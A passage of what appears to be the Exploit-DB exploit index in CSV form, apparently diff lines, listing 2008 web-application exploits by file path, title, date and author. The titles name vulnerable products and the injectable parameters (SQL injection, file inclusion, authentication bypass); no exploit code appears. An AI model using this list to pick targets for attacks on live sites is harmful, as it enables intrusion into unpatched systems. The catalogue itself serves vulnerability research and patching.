Injection",2008-10-14,g30rg3_x,webapps,php, +6748,exploits/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,webapps,php, +6749,exploits/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",webapps,php, +6751,exploits/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,webapps,php, +6754,exploits/php/webapps/6754.txt,"My PHP Dating - 'id' SQL Injection",2008-10-14,Hakxer,webapps,php, +6755,exploits/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,webapps,php, +6758,exploits/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' SQL Injection",2008-10-15,TurkishWarriorr,webapps,php, +6759,exploits/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,webapps,php, +6760,exploits/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' SQL Injection",2008-10-15,JosS,webapps,php, +6762,exploits/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,webapps,php, +6763,exploits/php/webapps/6763.txt,"Mosaic Commerce - 'cid' SQL Injection",2008-10-16,"Ali Abbasi",webapps,php, +6764,exploits/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,webapps,php, +6765,exploits/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,webapps,php, +6766,exploits/php/webapps/6766.txt,"PokerMax Poker League 0.13 - Insecure Cookie Handling",2008-10-16,DaRkLiFe,webapps,php, +6767,exploits/php/webapps/6767.txt,"Kure 0.6.3 - 'index.php' Local File Inclusion",2008-10-16,JosS,webapps,php, +6768,exploits/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,webapps,php, +6769,exploits/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,webapps,php, +6770,exploits/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' File Disclosure",2008-10-16,LMaster,webapps,php, +6771,exploits/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,webapps,cgi, +6772,exploits/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Local File Inclusion",2008-10-16,ZeN,webapps,php, +6777,exploits/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,webapps,php, +6778,exploits/php/webapps/6778.pl,"XOOPS Module GesGaleri - SQL Injection",2008-10-18,EcHoLL,webapps,php, +6779,exploits/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,webapps,php, +6780,exploits/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",webapps,php, +6781,exploits/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,webapps,php, +6782,exploits/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,webapps,php, +6783,exploits/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,webapps,php, +6784,exploits/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,webapps,php, +6785,exploits/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion",2008-10-19,NoGe,webapps,php, +6788,exploits/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Local File Inclusion",2008-10-19,Vrs-hCk,webapps,php, +6789,exploits/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,webapps,php, +6790,exploits/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,webapps,php, +6791,exploits/php/webapps/6791.pl,"e107 < 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,webapps,php, +6792,exploits/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' SQL Injection",2008-10-20,boom3rang,webapps,php, +6795,exploits/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,webapps,php, +6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,webapps,php, +6797,exploits/php/webapps/6797.txt,"LightBlog 9.8 - 'GET' / 'POST' / 'COOKIE' Local File Inclusion",2008-10-21,JosS,webapps,php, +6799,exploits/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' SQL Injection",2008-10-21,"Hussin X",webapps,php, +6802,exploits/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,webapps,php, +6803,exploits/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,webapps,php, +6806,exploits/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Local File Inclusion",2008-10-22,Pepelux,webapps,php, +6808,exploits/php/webapps/6808.pl,"LoudBlog 0.8.0a - 'ajax.php' SQL Injection",2008-10-22,Xianur0,webapps,php, +6809,exploits/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,webapps,php, +6810,exploits/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,webapps,asp, +6811,exploits/php/webapps/6811.txt,"YDC - 'cat' SQL Injection",2008-10-22,"Hussin X",webapps,php, +6814,exploits/php/webapps/6814.php,"CSPartner 1.0 - Delete All Users / SQL Injection",2008-10-23,StAkeR,webapps,php, +6816,exploits/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,webapps,php, +6817,exploits/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,webapps,php, +6818,exploits/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,webapps,php, +6819,exploits/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - SQL Injection",2008-10-23,"CWH Underground",webapps,php, +6820,exploits/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",webapps,php, +6821,exploits/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,webapps,php, +6822,exploits/php/webapps/6822.txt,"WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",webapps,php, +6823,exploits/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,webapps,php, +6826,exploits/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,webapps,php, +6827,exploits/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,webapps,php, +6829,exploits/php/webapps/6829.txt,"Aj RSS Reader - 'url' SQL Injection",2008-10-24,yassine_enp,webapps,php, +6830,exploits/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,webapps,php, +6833,exploits/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,webapps,php, +6835,exploits/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Remote File Disclosure",2008-10-24,b3hz4d,webapps,php, +6836,exploits/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,webapps,php, +6837,exploits/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injections",2008-10-25,G4N0K,webapps,php, +6839,exploits/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php?id' SQL Injection",2008-10-26,"Hussin X",webapps,php, +6842,exploits/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,webapps,php, +6843,exploits/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,webapps,php, +6844,exploits/php/webapps/6844.pl,"MyForum 1.3 - 'lecture.php' SQL Injection",2008-10-26,Vrs-hCk,webapps,php, +6845,exploits/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,webapps,cgi, +6846,exploits/php/webapps/6846.txt,"MyForum 1.3 - 'padmin' Local File Inclusion",2008-10-27,Vrs-hCk,webapps,php, +6847,exploits/php/webapps/6847.txt,"Persia BME E-Catalogue - SQL Injection",2008-10-27,BugReport.IR,webapps,php, +6848,exploits/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,webapps,php, +6849,exploits/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,webapps,php, +6850,exploits/php/webapps/6850.txt,"MyKtools 2.4 - 'langage' Local File Inclusion",2008-10-27,x0r,webapps,php, +6852,exploits/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Blind SQL Injection",2008-10-27,StAkeR,webapps,php, +6853,exploits/php/webapps/6853.txt,"QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,webapps,php, +6854,exploits/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,webapps,php, +6855,exploits/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,webapps,php, +6856,exploits/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,webapps,php, +6857,exploits/php/webapps/6857.txt,"MyForum 1.3 - Insecure Cookie Handling",2008-10-28,Stack,webapps,php, +6858,exploits/php/webapps/6858.txt,"PersianBB - 'id' SQL Injection",2008-10-28,"Hussin X",webapps,php, +6859,exploits/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2008-10-28,DaRkLiFe,webapps,php, +6860,exploits/php/webapps/6860.txt,"TlGuestBook 1.2 - Insecure Cookie Handling",2008-10-28,x0r,webapps,php, +6861,exploits/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution",2008-10-28,StAkeR,webapps,php, +6862,exploits/php/webapps/6862.txt,"H2O-CMS 3.4 - Insecure Cookie Handling",2008-10-29,Stack,webapps,php, +6864,exploits/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - 'board.cgi' Remote Command Execution",2008-10-29,GoLd_M,webapps,cgi, +6865,exploits/php/webapps/6865.txt,"e107 plugin fm pro 1 - File Disclosure / Arbitrary File Upload / Directory Traversal",2008-10-29,GoLd_M,webapps,php, +6866,exploits/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,webapps,php, +6867,exploits/php/webapps/6867.pl,"WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload",2008-10-29,t0pP8uZz,webapps,php, +6868,exploits/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,webapps,php, +6869,exploits/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,webapps,php, +6874,exploits/php/webapps/6874.txt,"Harlandscripts Pro Traffic One - 'mypage.php' SQL Injection",2008-10-29,"Beenu Arora",webapps,php, +6876,exploits/php/webapps/6876.txt,"Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,webapps,php, +6877,exploits/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php' SQL Injection",2008-10-29,"Hussin X",webapps,php, +6879,exploits/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection",2008-10-30,StAkeR,webapps,php, +6881,exploits/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,webapps,php, +6882,exploits/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,webapps,php, +6883,exploits/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Insecure Cookie Handling",2008-10-30,Hakxer,webapps,php, +6885,exploits/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'l_id' SQL Injection",2008-10-31,ZoRLu,webapps,php, +6886,exploits/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,webapps,php, +6887,exploits/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,webapps,php, +6888,exploits/php/webapps/6888.txt,"Tribiq CMS 5.0.10a (Windows) - Local File Inclusion",2008-10-31,GoLd_M,webapps,php, +6889,exploits/php/webapps/6889.txt,"Absolute Content Rotator 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6890,exploits/php/webapps/6890.txt,"Absolute Banner Manager - Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6891,exploits/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6892,exploits/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6893,exploits/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6894,exploits/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,webapps,php, +6895,exploits/php/webapps/6895.txt,"SFS EZ Adult Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,webapps,php, +6896,exploits/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - 'art' SQL Injection",2008-10-31,ZoRLu,webapps,php, +6897,exploits/php/webapps/6897.txt,"cPanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",webapps,php, +6898,exploits/php/webapps/6898.txt,"U-Mail Webmail 4.91 - 'edit.php' Arbitrary File Write",2008-10-31,"Shennan Wang",webapps,php, +6900,exploits/php/webapps/6900.txt,"Absolute News Manager 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6901,exploits/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6902,exploits/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,webapps,php, +6903,exploits/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,webapps,php, +6904,exploits/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,webapps,php, +6905,exploits/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,webapps,php, +6906,exploits/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,webapps,php, +6907,exploits/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,webapps,php, +6908,exploits/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,webapps,php, +6909,exploits/php/webapps/6909.txt,"Adult Banner Exchange Website - 'targetid' SQL Injection",2008-10-31,"Hussin X",webapps,php, +6910,exploits/php/webapps/6910.txt,"SFS EZ BIZ PRO - SQL Injection",2008-10-31,"Hussin X",webapps,php, +6911,exploits/php/webapps/6911.txt,"SFS EZ Affiliate - 'cat_id' SQL Injection",2008-10-31,d3b4g,webapps,php, +6912,exploits/php/webapps/6912.txt,"Article Publisher PRO 1.5 - Authentication Bypass",2008-10-31,Hakxer,webapps,php, +6913,exploits/php/webapps/6913.txt,"SFS EZ Webring - 'cat' SQL Injection",2008-10-31,d3b4g,webapps,php, +6914,exploits/php/webapps/6914.txt,"SFS EZ Hot or Not - 'phid' SQL Injection",2008-10-31,d3b4g,webapps,php, +6915,exploits/php/webapps/6915.txt,"SFS EZ Software - 'id' SQL Injection",2008-10-31,x0r,webapps,php, +6916,exploits/php/webapps/6916.txt,"ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion",2008-10-31,nigh7f411,webapps,php, +6917,exploits/php/webapps/6917.php,"Article Publisher PRO - 'userid' SQL Injection",2008-10-31,Stack,webapps,php, +6918,exploits/php/webapps/6918.txt,"SFS EZ Auction - Blind SQL Injection",2008-10-31,Stack,webapps,php, +6919,exploits/php/webapps/6919.txt,"SFS EZ Career - SQL Injection",2008-10-31,Stack,webapps,php, +6920,exploits/php/webapps/6920.txt,"SFS EZ Top Sites - SQL Injection",2008-10-31,Stack,webapps,php, +6922,exploits/php/webapps/6922.txt,"SFS EZ Webstore - 'where' SQL Injection",2008-11-01,ZoRLu,webapps,php, +6923,exploits/php/webapps/6923.txt,"SFS EZ Pub Site - SQL Injection",2008-11-01,Hakxer,webapps,php, +6924,exploits/php/webapps/6924.txt,"SFS EZ Gaming Cheats - SQL Injection",2008-11-01,ZoRLu,webapps,php, +6925,exploits/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - Insecure Cookie Handling / SQL Injection",2008-11-01,JosS,webapps,php, +6928,exploits/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,webapps,php, +6929,exploits/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,webapps,php, +6930,exploits/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - SQL Injection",2008-11-01,Bl@ckbe@rD,webapps,php, +6931,exploits/php/webapps/6931.txt,"YourFreeWorld Programs Rating - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6932,exploits/php/webapps/6932.txt,"AJ Article 1.0 - Authentication Bypass",2008-11-01,Hakxer,webapps,php, +6933,exploits/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change",2008-11-01,StAkeR,webapps,php, +6934,exploits/php/webapps/6934.txt,"Shahrood - Blind SQL Injection",2008-11-01,BazOka-HaCkEr,webapps,php, +6935,exploits/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'tr.php' SQL Injection",2008-11-01,"Hussin X",webapps,php, +6936,exploits/php/webapps/6936.txt,"YourFreeWorld Banner Management - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6937,exploits/php/webapps/6937.txt,"YourFreeWorld Blog Blaster - 'tr.php' SQL Injection",2008-11-01,"Hussin X",webapps,php, +6938,exploits/php/webapps/6938.txt,"YourFreeWorld Autoresponder Hosting - 'tr.php' SQL Injection",2008-11-01,"Hussin X",webapps,php, +6939,exploits/php/webapps/6939.txt,"YourFreeWorld Forced Matrix Script - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6940,exploits/php/webapps/6940.txt,"YourFreeWorld Short Url & Url Tracker - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6941,exploits/php/webapps/6941.txt,"YourFreeWorld Viral Marketing - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6942,exploits/php/webapps/6942.txt,"YourFreeWorld Scrolling Text Ads - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6943,exploits/php/webapps/6943.txt,"YourFreeWorld Reminder Service - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6944,exploits/php/webapps/6944.txt,"YourFreeWorld Classifieds Blaster - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6945,exploits/php/webapps/6945.txt,"YourFreeWorld Classifieds - 'category' SQL Injection",2008-11-01,"Hussin X",webapps,php, +6946,exploits/php/webapps/6946.txt,"Downline Goldmine Builder - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6947,exploits/php/webapps/6947.txt,"Downline Goldmine Category Addon - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6948,exploits/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6949,exploits/php/webapps/6949.txt,"YourFreeWorld URL Rotator - SQL Injection",2008-11-01,"Hussin X",webapps,php, +6950,exploits/php/webapps/6950.txt,"Downline Goldmine paidversion - SQL Injection",2008-11-02,"Hussin X",webapps,php, +6951,exploits/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder - SQL Injection",2008-11-02,"Hussin X",webapps,php, +6952,exploits/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - Blind SQL Injection",2008-11-02,"Hussin X",webapps,php, +6953,exploits/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php' SQL Injection",2008-11-02,JosS,webapps,php, +6954,exploits/php/webapps/6954.txt,"Maran PHP Shop - 'admin.php' Insecure Cookie Handling",2008-11-02,JosS,webapps,php, +6955,exploits/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,webapps,php, +6956,exploits/php/webapps/6956.txt,"Apartment Search Script - Arbitrary File Upload / Cross-Site Scripting",2008-11-02,ZoRLu,webapps,php, +6957,exploits/php/webapps/6957.txt,"NetRisk 2.0 - Cross-Site Scripting / SQL Injection",2008-11-02,StAkeR,webapps,php, +6958,exploits/php/webapps/6958.txt,"Maran PHP Shop - 'prodshow.php' SQL Injection",2008-11-02,d3v1l,webapps,php, +6960,exploits/php/webapps/6960.txt,"1st News - SQL Injection",2008-11-02,TR-ShaRk,webapps,php, +6961,exploits/php/webapps/6961.pl,"DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection",2008-11-02,anonymous,webapps,php, +6962,exploits/php/webapps/6962.txt,"BosClassifieds - 'cat_id' SQL Injection",2008-11-03,ZoRLu,webapps,php, +6964,exploits/php/webapps/6964.txt,"Acc Real Estate 4.0 - Insecure Cookie Handling",2008-11-03,Hakxer,webapps,php, +6965,exploits/php/webapps/6965.txt,"Acc Statistics 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,webapps,php, +6966,exploits/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,webapps,php, +6967,exploits/php/webapps/6967.txt,"MatPo Link 1.2b - SQL Injection",2008-11-03,ZoRLu,webapps,php, +6968,exploits/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,webapps,php, +6969,exploits/php/webapps/6969.txt,"Apoll 0.7b - Authentication Bypass",2008-11-03,ZoRLu,webapps,php, +6971,exploits/php/webapps/6971.txt,"MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting",2008-11-03,Hakxer,webapps,php, +6972,exploits/php/webapps/6972.txt,"pppBlog 0.3.11 - File Disclosure",2008-11-03,JosS,webapps,php, +6973,exploits/php/webapps/6973.txt,"TBmnetCMS 1.0 - Local File Inclusion",2008-11-04,d3v1l,webapps,php, +6974,exploits/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting",2008-11-04,G4N0K,webapps,php, +6975,exploits/php/webapps/6975.txt,"Joomla! Component VirtueMart Google Base 1.1 - Remote File Inclusion",2008-11-04,NoGe,webapps,php, +6976,exploits/php/webapps/6976.txt,"Joomla! Component ongumatimesheet20 4b - Remote File Inclusion",2008-11-04,NoGe,webapps,php, +6977,exploits/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection",2008-11-04,"Hussin X",webapps,php, +6978,exploits/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,webapps,php, +6979,exploits/php/webapps/6979.txt,"nicLOR Puglia Landscape - Local File Inclusion",2008-11-04,StAkeR,webapps,php, +6980,exploits/php/webapps/6980.txt,"Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion",2008-11-04,d3v1l,webapps,php, +6981,exploits/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' SQL Injection",2008-11-04,Cyber-Zone,webapps,php, +6982,exploits/php/webapps/6982.txt,"CMS-School 2005 - 'showarticle.php' SQL Injection",2008-11-04,Cyber-Zone,webapps,php, +6983,exploits/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentication Bypass",2008-11-04,Hakxer,webapps,php, +6984,exploits/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - Authentication Bypass",2008-11-04,Hakxer,webapps,php, +6985,exploits/php/webapps/6985.txt,"WEBBDOMAIN Quiz 1.02 - Authentication Bypass",2008-11-04,Hakxer,webapps,php, +6986,exploits/php/webapps/6986.txt,"WEBBDOMAIN Webshop 1.02 - Authentication Bypass",2008-11-04,Hakxer,webapps,php, +6987,exploits/php/webapps/6987.txt,"Simple Document Management System 1.1.4 - Authentication Bypass",2008-11-04,Yuri,webapps,php, +6988,exploits/php/webapps/6988.txt,"Tours Manager 1.0 - SQL Injection",2008-11-04,G4N0K,webapps,php, +6989,exploits/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - Authentication Bypass",2008-11-04,x0r,webapps,php, +6990,exploits/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,webapps,php, +6991,exploits/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Authentication Bypass",2008-11-04,StAkeR,webapps,php, +6992,exploits/php/webapps/6992.txt,"wotw 5.0 - Local/Remote File Inclusion",2008-11-04,dun,webapps,php, +6993,exploits/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",webapps,php, +6995,exploits/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,webapps,php, +6996,exploits/php/webapps/6996.php,"PHPX 3.5.16 - 'news_id' SQL Injection",2008-11-05,StAkeR,webapps,php, +6997,exploits/php/webapps/6997.txt,"Pre Podcast Portal - SQL Injection",2008-11-05,G4N0K,webapps,php, +6998,exploits/php/webapps/6998.txt,"Pre Shopping Mall - Insecure Cookie Handling",2008-11-05,G4N0K,webapps,php, +6999,exploits/php/webapps/6999.txt,"PreProject Multi-Vendor Shopping Malls - Multiple Vulnerabilities",2008-11-05,G4N0K,webapps,php, +7000,exploits/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,webapps,php, +7001,exploits/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,webapps,php, +7002,exploits/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,webapps,php, +7003,exploits/php/webapps/7003.txt,"PHP Auto Listings - 'pg' SQL Injection",2008-11-05,G4N0K,webapps,php, +7004,exploits/php/webapps/7004.txt,"Pre Simple CMS - Authentication Bypass",2008-11-05,"Hussin X",webapps,php, +7005,exploits/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,webapps,php, +7007,exploits/php/webapps/7007.txt,"Harlandscripts drinks - 'recid' SQL Injection",2008-11-05,"Ex Tacy",webapps,php, +7008,exploits/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,webapps,php, +7009,exploits/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,webapps,php, +7010,exploits/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - Authentication Bypass",2008-11-05,InjEctOr5,webapps,php, +7011,exploits/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - Local File Inclusion / Code Execution",2008-11-05,~elmysterio,webapps,php, +7012,exploits/php/webapps/7012.txt,"hMAilServer 4.4.2 - 'PHPWebAdmin' File Inclusion",2008-11-06,Nine:Situations:Group,webapps,php, +7013,exploits/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injections",2008-11-06,InjEctOr5,webapps,php, +7014,exploits/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,webapps,php, +7015,exploits/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - Authentication Bypass",2008-11-06,InjEctOr5,webapps,php, +7016,exploits/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,webapps,php, +7017,exploits/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,webapps,php, +7018,exploits/php/webapps/7018.txt,"NICE FAQ Script - Authentication Bypass",2008-11-06,r45c4l,webapps,php, +7019,exploits/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",webapps,php, +7020,exploits/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",webapps,php, +7021,exploits/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - Authentication Bypass",2008-11-06,Cyber-Zone,webapps,php, 